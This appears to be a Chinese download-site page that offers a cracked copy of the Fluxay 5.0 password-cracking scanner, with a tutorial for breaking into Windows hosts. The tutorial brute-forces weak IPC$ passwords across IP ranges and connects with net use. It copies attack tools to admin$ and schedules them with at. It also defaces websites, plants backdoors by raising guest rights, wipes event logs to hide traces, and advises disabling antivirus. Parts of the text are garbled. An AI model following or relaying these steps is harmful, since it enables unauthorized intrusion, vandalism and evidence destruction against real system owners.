流光Fluxay是中国第一代著名的黑客小榕的作品,一款绝好的ftp、pop3解密工具,界面豪华,功能强大,扫描系统服务器漏洞的利器。
流光5.0的破解可分为5大部分
一、POP3/FTP/…探测
二、IPC探测
三、SQL探测
四、高级扫描
因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光5.0的高级应用了:)
流光功能如下
1、用于检测POP3/FTP主机中用户密码安全漏洞。
2、163/169双通。
3、多线程检测,消除系统中密码漏洞。
4、高效的用户流模式。
5、高效服务器流模式,可同时对多台POP3/FTP主机进行检测。
6、最多500个线程探测。
7、线程超时设置,阻塞线程具有自杀功能,不会影响其他线程。
8、支持10个字典同时检测。
9、检测设置可作为项目保存。
10、取消了国内IP限制而且免费。
Fluxay5.0新增功能
1、加入了本地模式,在本机运行是不必安装Sensor。
2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。
3、后台扫描模式时,扫描的结果(*.PTR)可以直接通过附件发送到信箱。
4、Sensor的扫描速度加快。
5、减少了Sensor异常退出的BUG。
6、流光的界面和Sensor之间的通讯采用Triple-DES,密钥的长度最多可到192bits,保证整个传输过程不可监 听。扫描的结果也只有在密钥正确的情况下才可阅读。
7、修正的控制服务,新的控制服务在升级Sensor时不再会失败。
8、Sensor的服务名称可以任意指定,控制服务和Sensor的进程名称也可以任意指定。
9、支持XP(本地模式),很快会有98/ME的版本。
如何去除FluXayⅣ的使用时间限制
1.修改文件法
首先说说怎样解决流光Ⅳ过期的问题。使用流光Ⅳ之前,双击系统托盘中的时间,调出“日期/时间属性”对话框,在这里把系统时间调整到2001年。然后下载16进制文件编辑器winhex,WinHex可以打开EXE和dll文件对其中的16进制代码进行编辑修改。我们要用它来修改流光Ⅳ的主程序。下载之后,一路点击“下一步”即可安装完毕。
2.防火墙
如果你不喜欢自己动手修改软件,那么还可以使用下面这个办法去除流光Ⅳ的使用时间限制。安装任意一款网络防火墙,如天网防火墙。然后把系统日期调整为2001年,运行天网防火墙之后再运行流光Ⅳ,此时天网防火墙会报警两次,我们要做的禁止它们通行就可以了。怎样禁止?就是天网询问是否让其通过,请选择“禁止”,并把“以后都按照这次的操作进行” 选上,则以后上网只要打开天网防火墙,无论怎样流光Ⅳ都不会过期!
流光5.0破解版,安装请看压缩包里面的软件说明!
PS:此位黑客工具,很多网友加我们的客服问为什么会被杀毒杀,因为杀毒软件只要是黑客工具软件都会判断为病毒,所以请大家放心使用,使用前请最好关闭杀毒软件!
使用教程
1、你要有流光5.0,这里我实验用的是流光5.02001.FORWin2000汉化版。FORWin98的不能。由于IPC联网控制是NT/2000给予的功效。并且流光5.0FOR2K规定你电脑操作系统的是NT/2000,不然流光5.0总结会不成功!什么叫IPC:
IPC就是指"InterProcessCommunications",确切地说是ipc$,是默认在开机启动时的admin分享。
IPC$是WindowsNT/2K中独有的远程网络登录作用,它的作用是在同一时间内,2个IP中间只可以建立一个联接。
留意,你试图用IPC$联接会到EventLog中留有纪录。无论也许你登录成功。
能不能根据IPC$暴力破解密码?完全可以!但是,是否太笨了点…
2、初次运行流光5.0,会看见登记注册的界面,具体步骤请见自己第一篇实例教程。大家在主界面上能够方法有哪些来根据IPC探测得到管理工作的管理权限。这儿我们要作的是获得一台梯子,那就可以用准确率强的方法来探测了(检测一堆IP来获得弱口令)。
在主界面挑选探测→探测POP3/FTP/NT/SQL服务器选择项,然后直接按Ctrl+R。
3、出先了上边的悬浮窗口,键入我们要破译的IP段,大家键入了来看一下。我们可以把“将FrontPage服务器全自动添加HTTP服务器目录取消”。只要我们只想要得到IPC弱口令,这可以加速扫描仪速度:)填写IP,挑选扫描仪NT/98服务器
4、探测中……
(留意如果你想要探测的是流光5.0保存的国内IP段,会被禁止的,其实就是探测时公告栏发生"IP保存"字样)
有远程主机的管理密码了,大家接下来就是想尽办法操纵他了,有哪些找邦企么?)有的是!自己看看专用工具-菜单栏中的IIS远程连接命令:)是否很容易呢,我以后在讲,今日先训练net指令吧。
黑他!
开一个dosprompt实行如下所示指令,此次用的事例。
1、netuse\\另一方ip\ipc$"登陆密码"/user:"登录名"||创建远程桌面连接
2、copyicmd.exe\\另一方ip\admin$||admin$是对方的winnt文件目录)这儿文档多。
3、nettime\\另一方IP||看一下对方本地时间
4、at\\另一方ip启动程序的时间也启动程序名启动程序的主要参数||用at指令来定时启动程序流程,在这儿大家用soon这一程序流程做还可以,它能够替代3/4二步。
5、telnet另一方ip端口||
6、键入pass(要不是用icmd.exe,或没有设定动态口令就不用了)||
7、在开一个对话框,再次copy我们用的东西。copysock.execopyntlm.execopycl.execlear.exe
假如我们真想黑他,只需要将我们自己的主页文档遮盖目标主页就ok了,我们通过dir/sdefault.htm或是dir/sindex.htm来决定另一方页面的才行,一般是在X:\interpub\wwwroot\.
倘若主页文档是default.htm而且在c:\interpub\wwwroot,那样:copydefault.htm\\ip\c$\interpub\wwwroot
有演试
8、实际上黑人家是很低等而且没意思的:(大家最好物有所有,做成梯子吧,将来干活儿便捷点:
实行大家copy以往的ntlm.exe,撤销验正。在给自己留点个侧门,例如提高guest的管理权限,或者其他的侧门专用工具,这种东西多了她选吧,看一下杀手copy的那堆东西:)
9、还可以制成其它的么?
当然,只要是有时长,并愿意做,曾经的我悄悄的将自己的首页放进别人的server上,速度更快、空间无限,哈哈哈:)
10、日志消除,中断连接:
实行大家copy以往的cl.execlear.exe都能够消除日志,例如clearall:清除所有的日志。之后在中断连接:netuse\\ip\ipc$/delete
解压密码:www.kkx.net
下一篇:.cr2文件打开软件